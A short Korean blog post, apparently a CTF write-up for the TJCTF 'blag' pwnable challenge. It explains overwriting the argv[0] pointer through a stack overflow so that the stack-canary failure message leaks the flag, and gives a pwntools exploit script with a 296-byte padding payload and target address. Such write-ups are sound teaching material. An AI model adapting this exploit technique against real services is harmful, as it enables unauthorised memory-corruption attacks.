cdor1's lab
TJCTF blag 본문
후기 : 상준이형 블로그 목록에서 풀만한걸 찾다가 찾은 문제인데
예전에 풀었던 checker문제처럼 stack overflow로 argv[0]포인터를 덮어
카나리가 덮혀서 나오는 오류 문자에 flag가 따라 나오도록 하였다.
from pwn import *
s = remote('localhost' ,4000)
print s.recvuntil('> ')
s.sendline('add')
print s.recvuntil('Author?')
s.sendline('cdor1')
print s.recvuntil('Title?')
s.sendline('cdor1')
print s.recvuntil('Body?')
payload = 'A'*296
payload += p32(0x804B080)
s.sendline(payload)
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
WITHCON Final jnjn (0) | 2017.01.20 |
---|---|
HITCON 2014 stkof (0) | 2017.01.20 |
Hack.lu CTF 2014 OREO (0) | 2017.01.18 |
9447 CTF search engine (0) | 2017.01.18 |
SECCON 2016 shopping (0) | 2017.01.17 |
Comments